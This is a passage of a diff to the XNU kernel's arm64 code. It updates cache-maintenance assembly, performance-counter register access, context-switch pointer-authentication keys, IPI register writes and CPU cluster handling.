&segSizePRELINKINFO); segPLKLLVMCOVB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PLK_LLVM_COV", &segSizePLKLLVMCOV); @@ -1877,7 +1897,10 @@ arm_vm_init(uint64_t memory_size, boot_args * args) // fileset has kext PLK_TEXT_EXEC under kernel collection TEXT_EXEC following kernel's LAST segKCTEXTEXECB = (vm_offset_t) getsegdatafromheader(kc_mh, "__TEXT_EXEC", &segSizeKCTEXTEXEC); assert(segPLKTEXTEXECB && !segSizePLKTEXTEXEC); // kernel PLK_TEXT_EXEC must be empty - assert(segLASTB && segSizeLAST); // kernel LAST must not be empty + + assert(segLASTB); // kernel LAST can be empty, but it must have + // a valid address for computations below. 
+ assert(segKCTEXTEXECB <= segLASTB); // KC TEXT_EXEC must contain kernel LAST assert(segKCTEXTEXECB + segSizeKCTEXTEXEC >= segLASTB + segSizeLAST); segPLKTEXTEXECB = segLASTB + segSizeLAST; diff --git a/osfmk/arm64/bsd_arm64.c b/osfmk/arm64/bsd_arm64.c index e4ac467e5..3cee5ff33 100644 --- a/osfmk/arm64/bsd_arm64.c +++ b/osfmk/arm64/bsd_arm64.c @@ -34,7 +34,6 @@ #include #include -#include #include #include #include @@ -164,7 +163,7 @@ dtrace_get_cpu_int_stack_top(void) return getCpuDatap()->intstack_top; } #endif /* CONFIG_DTRACE */ -extern const char *mach_syscall_name_table[]; +extern const char *const mach_syscall_name_table[]; /* ARM64_TODO: remove this. still TODO?*/ extern struct proc* current_proc(void); diff --git a/osfmk/arm64/caches_asm.s b/osfmk/arm64/caches_asm.s index 958bc1936..00760c935 100644 --- a/osfmk/arm64/caches_asm.s +++ b/osfmk/arm64/caches_asm.s @@ -28,6 +28,7 @@ #include #include +#include #include #include #include "assym.s" @@ -126,16 +127,50 @@ L_ipui_done: .endmacro /* - * Detects the presence of an L2 cache and returns 1 if implemented, - * zero otherwise. - * + * Returns the cache configuration for the specified level * $0: Output register + * $1: Cache level register + * $2: Scratch register */ -.macro HAS_L2_CACHE +.macro CACHE_AT_LEVEL mrs $0, CLIDR_EL1 - ubfx $0, $0, #3, #3 // extract L2 cache Ctype - cmp $0, #0x1 - cset $0, hi + add $2, $1, $1, lsl #1 + lsr $0, $0, $2 + and $0, $0, #7 // extract cache type +.endmacro + +/* + * Perform set/way maintenance to the desired cache level + * $0: 'dc' set/way variant, e.g. 
csw or cisw + * x0: maximum cache level, 0-based, inclusive + */ +.macro DCACHE_SET_WAY + dmb sy + mov x1, #0 +1: + CACHE_AT_LEVEL x2, x1, x3 + cbz x2, 5f // No cache at this level, all higher levels may be skipped + cmp x2, #2 + b.lt 4f // No data cache at this level, skip to next level + mov x2, x1 + GET_CACHE_CONFIG x2, x9, x10, x11 + lsl x2, x1, #1 // level field for cisw/csw, bits 1:3 +2: +3: + dc $0, x2 // clean dcache line by way/set + add x2, x2, x9 // increment set index + tst x2, x10 // look for overflow + b.eq 3b + bic x2, x2, x10 // clear set overflow + adds w2, w2, w11 // increment way + b.cc 2b // loop + dsb sy // ensure completion of prior level maintenance +4: + add x1, x1, #1 + cmp x1, x0 + b.ls 1b // next level +5: + ret .endmacro /* @@ -149,43 +184,14 @@ L_ipui_done: .globl EXT(clean_mmu_dcache) LEXT(CleanPoC_Dcache) #if defined(APPLE_ARM64_ARCH_FAMILY) + dsb sy + ret /* "Fully Coherent." */ #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */ - mov x0, #0 - GET_CACHE_CONFIG x0, x9, x10, x11 - - dmb sy - mov x0, #0 -L_cpcd_dcacheway: -L_cpcd_dcacheline: - dc csw, x0 // clean dcache line by way/set - add x0, x0, x9 // increment set index - tst x0, x10 // look for overflow - b.eq L_cpcd_dcacheline - bic x0, x0, x10 // clear set overflow - adds w0, w0, w11 // increment way - b.cc L_cpcd_dcacheway // loop - - HAS_L2_CACHE x0 - cbz x0, L_cpcd_skipl2dcache - mov x0, #1 - GET_CACHE_CONFIG x0, x9, x10, x11 - - dsb sy - mov x0, #2 -L_cpcd_l2dcacheway: -L_cpcd_l2dcacheline: - dc csw, x0 // clean dcache line by way/set - add x0, x0, x9 // increment set index - tst x0, x10 // look for overflow - b.eq L_cpcd_l2dcacheline - bic x0, x0, x10 // clear set overflow - adds w0, w0, w11 // increment way - b.cc L_cpcd_l2dcacheway // loop -L_cpcd_skipl2dcache: + mrs x0, CLIDR_EL1 + ubfx x0, x0, #24, #3 // extract CLIDR_EL1.LoC + DCACHE_SET_WAY csw #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */ - dsb sy - ret /* * void CleanPoU_Dcache(void) @@ -197,25 +203,14 @@ 
L_cpcd_skipl2dcache: .globl EXT(CleanPoU_Dcache) LEXT(CleanPoU_Dcache) #if defined(APPLE_ARM64_ARCH_FAMILY) - /* "Fully Coherent." */ -#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */ - mov x0, #0 - GET_CACHE_CONFIG x0, x9, x10, x11 - - dmb sy - mov x0, #0 -L_cpud_dcacheway: -L_cpud_dcacheline: - dc csw, x0 // clean dcache line by way/set - add x0, x0, x9 // increment set index - tst x0, x10 // look for overflow - b.eq L_cpud_dcacheline - bic x0, x0, x10 // clear set overflow - adds w0, w0, w11 // increment way - b.cc L_cpud_dcacheway // loop - #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */ dsb sy ret + /* "Fully Coherent." */ +#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */ + mrs x0, CLIDR_EL1 + ubfx x0, x0, #21, 3 // extract CLIDR_EL1.LoUIS + DCACHE_SET_WAY csw +#endif /* defined(APPLE_ARM64_ARCH_FAMILY) */ /* * void CleanPoU_DcacheRegion(vm_offset_t va, unsigned length) @@ -253,24 +248,30 @@ L_cpudr_loop: .text .align 2 LEXT(CleanPoC_DcacheRegion_internal) - mov x9, #((1<permanent && + if (__improbable(src_zone && !src_zone->z_permanent && kernel_buf_size < nbytes)) { panic("copyio_preflight: kernel buffer 0x%lx has size %lu < nbytes %lu", kernel_addr, kernel_buf_size, nbytes); diff --git a/osfmk/arm64/cswitch.s b/osfmk/arm64/cswitch.s index 8ba394661..1e0e214e6 100644 --- a/osfmk/arm64/cswitch.s +++ b/osfmk/arm64/cswitch.s @@ -201,6 +201,19 @@ #endif +#if CSWITCH_ROP_KEYS + ldr \new_key, [\thread, TH_ROP_PID] + REPROGRAM_ROP_KEYS Lskip_rop_keys_\@, \new_key, \cpudatap, \tmp_key + mov \wsync, #1 +Lskip_rop_keys_\@: +#endif /* CSWITCH_ROP_KEYS */ + +#if CSWITCH_JOP_KEYS + ldr \new_key, [\thread, TH_JOP_PID] + REPROGRAM_JOP_KEYS Lskip_jop_keys_\@, \new_key, \cpudatap, \tmp_key + mov \wsync, #1 +Lskip_jop_keys_\@: +#endif /* CSWITCH_JOP_KEYS */ cbz \wsync, 1f isb sy diff --git a/osfmk/arm64/exception_asm.h b/osfmk/arm64/exception_asm.h index 18fd6df99..411da5630 100644 --- a/osfmk/arm64/exception_asm.h +++ b/osfmk/arm64/exception_asm.h @@ -26,7 +26,6 @@ * 
@APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ -#include #include #include "assym.s" diff --git a/osfmk/arm64/hibernate_restore.c b/osfmk/arm64/hibernate_restore.c index 2ed851c12..2c985f2f5 100644 --- a/osfmk/arm64/hibernate_restore.c +++ b/osfmk/arm64/hibernate_restore.c @@ -97,6 +97,9 @@ void pal_hib_patchup(pal_hib_ctx_t *ctx) { + /* Reinit the ppl hib lock as it was saved to the hibernation image held. */ + ppl_hib_lock_reinit(); + // DRAM pages are captured from a PPL context, so here we restore all cpu_data structures to a non-PPL context for (int i = 0; i < MAX_CPUS; i++) { pmap_cpu_data_array[i].cpu_data.ppl_state = PPL_STATE_KERNEL; diff --git a/osfmk/arm64/kpc.c b/osfmk/arm64/kpc.c index 973723ffc..d8e732699 100644 --- a/osfmk/arm64/kpc.c +++ b/osfmk/arm64/kpc.c @@ -141,37 +141,6 @@ void kpc_pmi_handler(unsigned int ctr); #define PMESR_EVT_ENCODE(EVT, PMC, OFF) \ (((EVT) & PMESR_PMC_MASK) << PMESR_SHIFT(PMC, OFF)) -/* system registers in the CPMU */ - -#define SREG_PMCR0 "S3_1_c15_c0_0" -#define SREG_PMCR1 "S3_1_c15_c1_0" -#define SREG_PMCR2 "S3_1_c15_c2_0" -#define SREG_PMCR3 "S3_1_c15_c3_0" -#define SREG_PMCR4 "S3_1_c15_c4_0" -#define SREG_PMESR0 "S3_1_c15_c5_0" -#define SREG_PMESR1 "S3_1_c15_c6_0" -#define SREG_PMSR "S3_1_c15_c13_0" -#define SREG_OPMAT0 "S3_1_c15_c7_0" -#define SREG_OPMAT1 "S3_1_c15_c8_0" -#define SREG_OPMSK0 "S3_1_c15_c9_0" -#define SREG_OPMSK1 "S3_1_c15_c10_0" - -#define SREG_PMC0 "S3_2_c15_c0_0" -#define SREG_PMC1 "S3_2_c15_c1_0" -#define SREG_PMC2 "S3_2_c15_c2_0" -#define SREG_PMC3 "S3_2_c15_c3_0" -#define SREG_PMC4 "S3_2_c15_c4_0" -#define SREG_PMC5 "S3_2_c15_c5_0" -#define SREG_PMC6 "S3_2_c15_c6_0" -#define SREG_PMC7 "S3_2_c15_c7_0" -#define SREG_PMC8 "S3_2_c15_c9_0" -#define SREG_PMC9 "S3_2_c15_c10_0" - -#define SREG_PMMMAP "S3_2_c15_c15_0" -#define SREG_PMTRHLD2 "S3_2_c15_c14_0" -#define SREG_PMTRHLD4 "S3_2_c15_c13_0" -#define SREG_PMTRHLD6 "S3_2_c15_c12_0" - /* * The low 8 bits of a configuration words select the event to program 
on * PMESR{0,1}. Bits 16-19 are mapped to PMCR1 bits. @@ -318,26 +287,26 @@ static void dump_regs(void) { uint64_t val; - kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR0)); - kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR1)); - kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR2)); - kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR3)); - kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR4)); - kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR0)); - kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR1)); - - kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC0)); - kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC1)); - kprintf("PMC2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC2)); - kprintf("PMC3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC3)); - kprintf("PMC4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC4)); - kprintf("PMC5 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC5)); - kprintf("PMC6 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC6)); - kprintf("PMC7 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC7)); + kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C0_0")); + kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C1_0")); + kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C2_0")); + kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C3_0")); + kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C4_0")); + kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C5_0")); + kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C6_0")); + + kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ("PMC0")); + kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ("PMC1")); + kprintf("S3_2_C15_C2_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C2_0")); + kprintf("S3_2_C15_C3_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C3_0")); + kprintf("S3_2_C15_C4_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C4_0")); + kprintf("S3_2_C15_C5_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C5_0")); + kprintf("S3_2_C15_C6_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C6_0")); + kprintf("S3_2_C15_C7_0 = 
0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C7_0")); #if (KPC_ARM64_CONFIGURABLE_COUNT > 6) - kprintf("PMC8 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC8)); - kprintf("PMC9 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC9)); + kprintf("S3_2_C15_C9_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C9_0")); + kprintf("S3_2_C15_C10_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C10_0")); #endif } #endif @@ -348,7 +317,7 @@ enable_counter(uint32_t counter) uint64_t pmcr0 = 0; boolean_t counter_running, pmi_enabled, enabled; - pmcr0 = SREG_READ(SREG_PMCR0) | 0x3 /* leave the fixed counters enabled for monotonic */; + pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3 /* leave the fixed counters enabled for monotonic */; counter_running = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0; pmi_enabled = (pmcr0 & PMCR0_PMI_ENABLE_MASK(counter)) != 0; @@ -358,7 +327,7 @@ enable_counter(uint32_t counter) if (!enabled) { pmcr0 |= PMCR0_PMC_ENABLE_MASK(counter); pmcr0 |= PMCR0_PMI_ENABLE_MASK(counter); - SREG_WRITE(SREG_PMCR0, pmcr0); + SREG_WRITE("S3_1_C15_C0_0", pmcr0); } return enabled; @@ -374,12 +343,12 @@ disable_counter(uint32_t counter) return true; } - pmcr0 = SREG_READ(SREG_PMCR0) | 0x3; + pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3; enabled = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0; if (enabled) { pmcr0 &= PMCR0_PMC_DISABLE_MASK(counter); - SREG_WRITE(SREG_PMCR0, pmcr0); + SREG_WRITE("S3_1_C15_C0_0", pmcr0); } return enabled; @@ -418,11 +387,11 @@ set_modes(uint32_t counter, kpc_config_t cfgword) bits = PMCR1_EL_ALL_ENABLE_MASK(counter); } - uint64_t pmcr1 = SREG_READ(SREG_PMCR1); + uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0"); pmcr1 &= PMCR1_EL_ALL_DISABLE_MASK(counter); pmcr1 |= bits; pmcr1 |= 0x30303; /* monotonic compatibility */ - SREG_WRITE(SREG_PMCR1, pmcr1); + SREG_WRITE("S3_1_C15_C1_0", pmcr1); saved_PMCR[cpuid][1] = pmcr1; } @@ -430,17 +399,17 @@ static uint64_t read_counter(uint32_t counter) { switch (counter) { - // case 0: return SREG_READ(SREG_PMC0); - // case 1: return SREG_READ(SREG_PMC1); - 
case 2: return SREG_READ(SREG_PMC2); - case 3: return SREG_READ(SREG_PMC3); - case 4: return SREG_READ(SREG_PMC4); - case 5: return SREG_READ(SREG_PMC5); - case 6: return SREG_READ(SREG_PMC6); - case 7: return SREG_READ(SREG_PMC7); + // case 0: return SREG_READ("PMC0"); + // case 1: return SREG_READ("PMC1"); + case 2: return SREG_READ("S3_2_C15_C2_0"); + case 3: return SREG_READ("S3_2_C15_C3_0"); + case 4: return SREG_READ("S3_2_C15_C4_0"); + case 5: return SREG_READ("S3_2_C15_C5_0"); + case 6: return SREG_READ("S3_2_C15_C6_0"); + case 7: return SREG_READ("S3_2_C15_C7_0"); #if (KPC_ARM64_CONFIGURABLE_COUNT > 6) - case 8: return SREG_READ(SREG_PMC8); - case 9: return SREG_READ(SREG_PMC9); + case 8: return SREG_READ("S3_2_C15_C9_0"); + case 9: return SREG_READ("S3_2_C15_C10_0"); #endif default: return 0; } @@ -450,17 +419,17 @@ static void write_counter(uint32_t counter, uint64_t value) { switch (counter) { - // case 0: SREG_WRITE(SREG_PMC0, value); break; - // case 1: SREG_WRITE(SREG_PMC1, value); break; - case 2: SREG_WRITE(SREG_PMC2, value); break; - case 3: SREG_WRITE(SREG_PMC3, value); break; - case 4: SREG_WRITE(SREG_PMC4, value); break; - case 5: SREG_WRITE(SREG_PMC5, value); break; - case 6: SREG_WRITE(SREG_PMC6, value); break; - case 7: SREG_WRITE(SREG_PMC7, value); break; + // case 0: SREG_WRITE("PMC0", value); break; + // case 1: SREG_WRITE("PMC1", value); break; + case 2: SREG_WRITE("S3_2_C15_C2_0", value); break; + case 3: SREG_WRITE("S3_2_C15_C3_0", value); break; + case 4: SREG_WRITE("S3_2_C15_C4_0", value); break; + case 5: SREG_WRITE("S3_2_C15_C5_0", value); break; + case 6: SREG_WRITE("S3_2_C15_C6_0", value); break; + case 7: SREG_WRITE("S3_2_C15_C7_0", value); break; #if (KPC_ARM64_CONFIGURABLE_COUNT > 6) - case 8: SREG_WRITE(SREG_PMC8, value); break; - case 9: SREG_WRITE(SREG_PMC9, value); break; + case 8: SREG_WRITE("S3_2_C15_C9_0", value); break; + case 9: SREG_WRITE("S3_2_C15_C10_0", value); break; #endif default: break; } @@ -475,18 +444,18 @@ 
kpc_rawpmu_config_count(void) int kpc_get_rawpmu_config(kpc_config_t *configv) { - configv[0] = SREG_READ(SREG_PMCR2); - configv[1] = SREG_READ(SREG_PMCR3); - configv[2] = SREG_READ(SREG_PMCR4); - configv[3] = SREG_READ(SREG_OPMAT0); - configv[4] = SREG_READ(SREG_OPMAT1); - configv[5] = SREG_READ(SREG_OPMSK0); - configv[6] = SREG_READ(SREG_OPMSK1); + configv[0] = SREG_READ("S3_1_C15_C2_0"); + configv[1] = SREG_READ("S3_1_C15_C3_0"); + configv[2] = SREG_READ("S3_1_C15_C4_0"); + configv[3] = SREG_READ("S3_1_C15_C7_0"); + configv[4] = SREG_READ("S3_1_C15_C8_0"); + configv[5] = SREG_READ("S3_1_C15_C9_0"); + configv[6] = SREG_READ("S3_1_C15_C10_0"); #if RAWPMU_CONFIG_COUNT > 7 - configv[7] = SREG_READ(SREG_PMMMAP); - configv[8] = SREG_READ(SREG_PMTRHLD2); - configv[9] = SREG_READ(SREG_PMTRHLD4); - configv[10] = SREG_READ(SREG_PMTRHLD6); + configv[7] = SREG_READ("S3_2_C15_C15_0"); + configv[8] = SREG_READ("S3_2_C15_C14_0"); + configv[9] = SREG_READ("S3_2_C15_C13_0"); + configv[10] = SREG_READ("S3_2_C15_C12_0"); #endif return 0; } @@ -494,18 +463,18 @@ kpc_get_rawpmu_config(kpc_config_t *configv) static int kpc_set_rawpmu_config(kpc_config_t *configv) { - SREG_WRITE(SREG_PMCR2, configv[0]); - SREG_WRITE(SREG_PMCR3, configv[1]); - SREG_WRITE(SREG_PMCR4, configv[2]); - SREG_WRITE(SREG_OPMAT0, configv[3]); - SREG_WRITE(SREG_OPMAT1, configv[4]); - SREG_WRITE(SREG_OPMSK0, configv[5]); - SREG_WRITE(SREG_OPMSK1, configv[6]); + SREG_WRITE("S3_1_C15_C2_0", configv[0]); + SREG_WRITE("S3_1_C15_C3_0", configv[1]); + SREG_WRITE("S3_1_C15_C4_0", configv[2]); + SREG_WRITE("S3_1_C15_C7_0", configv[3]); + SREG_WRITE("S3_1_C15_C8_0", configv[4]); + SREG_WRITE("S3_1_C15_C9_0", configv[5]); + SREG_WRITE("S3_1_C15_C10_0", configv[6]); #if RAWPMU_CONFIG_COUNT > 7 - SREG_WRITE(SREG_PMMMAP, configv[7]); - SREG_WRITE(SREG_PMTRHLD2, configv[8]); - SREG_WRITE(SREG_PMTRHLD4, configv[9]); - SREG_WRITE(SREG_PMTRHLD6, configv[10]); + SREG_WRITE("S3_2_C15_C15_0", configv[7]); + 
SREG_WRITE("S3_2_C15_C14_0", configv[8]); + SREG_WRITE("S3_2_C15_C13_0", configv[9]); + SREG_WRITE("S3_2_C15_C12_0", configv[10]); #endif return 0; } @@ -520,13 +489,13 @@ save_regs(void) assert(ml_get_interrupts_enabled() == FALSE); /* Save event selections. */ - saved_PMESR[cpuid][0] = SREG_READ(SREG_PMESR0); - saved_PMESR[cpuid][1] = SREG_READ(SREG_PMESR1); + saved_PMESR[cpuid][0] = SREG_READ("S3_1_C15_C5_0"); + saved_PMESR[cpuid][1] = SREG_READ("S3_1_C15_C6_0"); kpc_get_rawpmu_config(saved_RAWPMU[cpuid]); /* Disable the counters. */ - // SREG_WRITE(SREG_PMCR0, clear); + // SREG_WRITE("S3_1_C15_C0_0", clear); /* Finally, save state for each counter*/ for (int i = 2; i < KPC_ARM64_PMC_COUNT; i++) { @@ -540,8 +509,8 @@ restore_regs(void) int cpuid = cpu_number(); /* Restore PMESR values. */ - SREG_WRITE(SREG_PMESR0, saved_PMESR[cpuid][0]); - SREG_WRITE(SREG_PMESR1, saved_PMESR[cpuid][1]); + SREG_WRITE("S3_1_C15_C5_0", saved_PMESR[cpuid][0]); + SREG_WRITE("S3_1_C15_C6_0", saved_PMESR[cpuid][1]); kpc_set_rawpmu_config(saved_RAWPMU[cpuid]); @@ -551,7 +520,7 @@ restore_regs(void) } /* Restore PMCR0/1 values (with PMCR0 last to enable). 
*/ - SREG_WRITE(SREG_PMCR1, saved_PMCR[cpuid][1] | 0x30303); + SREG_WRITE("S3_1_C15_C1_0", saved_PMCR[cpuid][1] | 0x30303); } static uint64_t @@ -564,7 +533,7 @@ get_counter_config(uint32_t counter) case 3: /* FALLTHROUGH */ case 4: /* FALLTHROUGH */ case 5: - pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR0), counter, 2); + pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C5_0"), counter, 2); break; case 6: /* FALLTHROUGH */ case 7: @@ -573,7 +542,7 @@ get_counter_config(uint32_t counter) case 8: /* FALLTHROUGH */ case 9: #endif - pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR1), counter, 6); + pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C6_0"), counter, 6); break; default: pmesr = 0; @@ -582,7 +551,7 @@ get_counter_config(uint32_t counter) kpc_config_t config = pmesr; - uint64_t pmcr1 = SREG_READ(SREG_PMCR1); + uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0"); if (pmcr1 & PMCR1_EL0_A32_ENABLE_MASK(counter)) { config |= CFGWORD_EL0A32EN_MASK; @@ -616,10 +585,10 @@ set_counter_config(uint32_t counter, uint64_t config) case 3: /* FALLTHROUGH */ case 4: /* FALLTHROUGH */ case 5: - pmesr = SREG_READ(SREG_PMESR0); + pmesr = SREG_READ("S3_1_C15_C5_0"); pmesr &= PMESR_EVT_CLEAR(counter, 2); pmesr |= PMESR_EVT_ENCODE(config, counter, 2); - SREG_WRITE(SREG_PMESR0, pmesr); + SREG_WRITE("S3_1_C15_C5_0", pmesr); saved_PMESR[cpuid][0] = pmesr; break; @@ -630,10 +599,10 @@ set_counter_config(uint32_t counter, uint64_t config) case 8: /* FALLTHROUGH */ case 9: #endif - pmesr = SREG_READ(SREG_PMESR1); + pmesr = SREG_READ("S3_1_C15_C6_0"); pmesr &= PMESR_EVT_CLEAR(counter, 6); pmesr |= PMESR_EVT_ENCODE(config, counter, 6); - SREG_WRITE(SREG_PMESR1, pmesr); + SREG_WRITE("S3_1_C15_C6_0", pmesr); saved_PMESR[cpuid][1] = pmesr; break; default: diff --git a/osfmk/arm64/locore.s b/osfmk/arm64/locore.s index c85b85ebc..6f9bf122b 100644 --- a/osfmk/arm64/locore.s +++ b/osfmk/arm64/locore.s @@ -27,6 +27,7 @@ */ #include +#include #include #include #include @@ -69,14 +70,14 @@ .macro 
COMPARE_BRANCH_FUSION #if defined(APPLE_ARM64_ARCH_FAMILY) - mrs $1, ARM64_REG_HID1 + mrs $1, HID1 .if $0 == CBF_DISABLE orr $1, $1, ARM64_REG_HID1_disCmpBrFusion .else mov $2, ARM64_REG_HID1_disCmpBrFusion bic $1, $1, $2 .endif - msr ARM64_REG_HID1, $1 + msr HID1, $1 .if $0 == CBF_DISABLE isb sy .endif @@ -938,13 +939,9 @@ no_asts: ARM64_IS_PCORE x12 // if we're not a pCORE, also do nothing cbz x12, 1f -#endif - -#if defined(APPLELIGHTNING) || defined(APPLEFIRESTORM) - - mrs x12, ARM64_REG_HID1 // if any debug session ever existed, set forceNexL3ClkOn + mrs x12, HID1 // if any debug session ever existed, set forceNexL3ClkOn orr x12, x12, ARM64_REG_HID1_forceNexL3ClkOn - msr ARM64_REG_HID1, x12 + msr HID1, x12 1: #endif diff --git a/osfmk/arm64/machine_routines.c b/osfmk/arm64/machine_routines.c index c40e24e6f..3b616122b 100644 --- a/osfmk/arm64/machine_routines.c +++ b/osfmk/arm64/machine_routines.c @@ -184,15 +184,15 @@ ml_cpu_signal_type(unsigned int cpu_mpidr, uint32_t type) MRS(local_mpidr, "MPIDR_EL1"); if (MPIDR_CLUSTER_ID(local_mpidr) == MPIDR_CLUSTER_ID(cpu_mpidr)) { uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr); - MSR(ARM64_REG_IPI_RR_LOCAL, x); + MSR("S3_5_C15_C0_0", x); } else { #define IPI_RR_TARGET_CLUSTER_SHIFT 16 uint64_t x = type | (MPIDR_CLUSTER_ID(cpu_mpidr) << IPI_RR_TARGET_CLUSTER_SHIFT) | MPIDR_CPU_ID(cpu_mpidr); - MSR(ARM64_REG_IPI_RR_GLOBAL, x); + MSR("S3_5_C15_C0_1", x); } #else uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr); - MSR(ARM64_REG_IPI_RR, x); + MSR("S3_5_C15_C0_1", x); #endif } #endif @@ -236,7 +236,7 @@ ml_cpu_signal_deferred_adjust_timer(uint64_t nanosecs) /* update deferred_ipi_timer_ns with the new clamped value */ absolutetime_to_nanoseconds(abstime, &deferred_ipi_timer_ns); - MSR(ARM64_REG_IPI_CR, abstime); + MSR("S3_5_C15_C3_1", abstime); #else (void)nanosecs; panic("Platform does not support ACC Fast IPI"); @@ -494,6 +494,7 @@ machine_processor_shutdown( return Shutdown_context(doshutdown, processor); } + /* * Routine: 
ml_init_lock_timeout * Function: @@ -531,6 +532,8 @@ ml_init_lock_timeout(void) } MutexSpin = abstime; low_MutexSpin = MutexSpin; + + /* * high_MutexSpin should be initialized as low_MutexSpin * real_ncpus, but * real_ncpus is not set at this time @@ -543,6 +546,17 @@ ml_init_lock_timeout(void) nanoseconds_to_absolutetime(MAX_WFE_HINT_INTERVAL_US * NSEC_PER_USEC, &ml_wfe_hint_max_interval); } +/* + * This is called when all of the ml_processor_info_t structures have been + * initialized and all the processors have been started through processor_start(). + * + * Required by the scheduler subsystem. + */ +void +ml_cpu_init_completed(void) +{ +} + /* * This is called from the machine-independent routine cpu_up() * to perform machine-dependent info updates. @@ -822,29 +836,6 @@ ml_read_chip_revision(unsigned int *rev __unused) #endif } -static boolean_t -ml_parse_interrupt_prop(const DTEntry entry, ml_topology_cpu_t *cpu) -{ - uint32_t const *prop; - unsigned int propSize; - - if (SecureDTGetProperty(entry, "interrupts", (void const **)&prop, &propSize) != kSuccess) { - return FALSE; - } - - if (propSize == sizeof(uint32_t) * 1) { - cpu->pmi_irq = prop[0]; - return TRUE; - } else if (propSize == sizeof(uint32_t) * 3) { - cpu->self_ipi_irq = prop[0]; - cpu->pmi_irq = prop[1]; - cpu->other_ipi_irq = prop[2]; - return TRUE; - } else { - return FALSE; - } -} - void ml_parse_cpu_topology(void) { @@ -903,7 +894,6 @@ ml_parse_cpu_topology(void) cpu->l3_cache_size = (uint32_t)ml_readprop(child, "l3-cache-size", 0); cpu->l3_cache_id = (uint32_t)ml_readprop(child, "l3-cache-id", 0); - ml_parse_interrupt_prop(child, cpu); ml_read_reg_range(child, "cpu-uttdbg-reg", &cpu->cpu_UTTDBG_pa, &cpu->cpu_UTTDBG_len); ml_read_reg_range(child, "cpu-impl-reg", &cpu->cpu_IMPL_pa, &cpu->cpu_IMPL_len); ml_read_reg_range(child, "coresight-reg", &cpu->coresight_pa, &cpu->coresight_len); @@ -1231,7 +1221,43 @@ ml_processor_register(ml_processor_info_t *in_processor_info, 
this_cpu_datap->cluster_master = is_boot_cpu; #endif /* HAS_CLUSTER */ +#if !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) + { + /* Workaround for the existing scheduler + * code, which only supports a limited number of psets. + * + * To get around that limitation, we distribute all cores into + * two psets according to their cluster type, instead of + * having a dedicated pset per cluster ID. + */ + + pset_cluster_type_t pset_cluster_type; + + /* For this workaround, we don't expect seeing anything else + * than E or P clusters. */ + switch (in_processor_info->cluster_type) { + case CLUSTER_TYPE_E: + pset_cluster_type = PSET_AMP_E; + break; + case CLUSTER_TYPE_P: + pset_cluster_type = PSET_AMP_P; + break; + default: + panic("unknown/unsupported cluster type %d", in_processor_info->cluster_type); + } + + pset = pset_find_first_by_cluster_type(pset_cluster_type); + + if (pset == NULL) { + panic("no pset for cluster type %d/%d", in_processor_info->cluster_type, pset_cluster_type); + } + + kprintf("%s>chosen pset with cluster id %d cluster type %d for core:\n", + __FUNCTION__, pset->pset_cluster_id, pset->pset_cluster_type); + } +#else /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */ pset = pset_find(in_processor_info->cluster_id, processor_pset(master_processor)); +#endif /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */ assert(pset != NULL); kprintf("%s>cpu_id %p cluster_id %d cpu_number %d is type %d\n", __FUNCTION__, 